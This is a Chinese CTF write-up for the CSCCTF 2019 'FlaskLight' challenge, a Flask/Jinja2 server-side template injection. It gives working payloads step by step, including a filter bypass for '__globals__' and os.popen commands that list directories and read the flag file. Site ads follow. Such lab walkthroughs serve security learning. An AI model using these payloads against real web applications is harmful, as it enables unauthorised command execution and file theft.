[CSCCTF 2019 Qual]FlaskLight 1|SSTI注入
1、打开之后查看源代码信息,发现提示信息,结果如下:
2、根据提示输入参数进行测试,payload:?search={{2*2}},结果如下:
3、确定了注入点之后那就获取下系统目录,payload:?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__[%27__globals__%27][%27os%27].popen("ls").read()}},结果返回错误,结果如下:
4、猜测是过滤了__globals__,那就尝试拼接一下,payload:?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__[%27__g%27+%27lobals__%27][%27os%27].popen("ls").read()}},成功获取到目录信息,结果如下:
5、读取下flasklight目录,payload:?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__[%27__g%27+%27lobals__%27][%27os%27].popen("ls%20/flasklight").read()}},结果如下:
6、读取下coomme_geeeett_youur_flek(come_get_you_flag)文件,差点没看出来,payload:?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__[%27__g%27+%27lobals__%27][%27os%27].popen("cat%20/flasklight/coomme_geeeett_youur_flek").read()}},成功获取到flag信息,结果如下:
如果您觉得阅读本文对您有帮助,请点一下“推荐”按钮,您的“推荐”将是我最大的写作动力!欢迎各位转载,但是未经作者本人同意,转载文章之后必须在文章页面明显位置给出作者和原文连接,否则保留追究法律责任的权利。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?
· 如何调用 DeepSeek 的自然语言处理 API 接口并集成到在线客服系统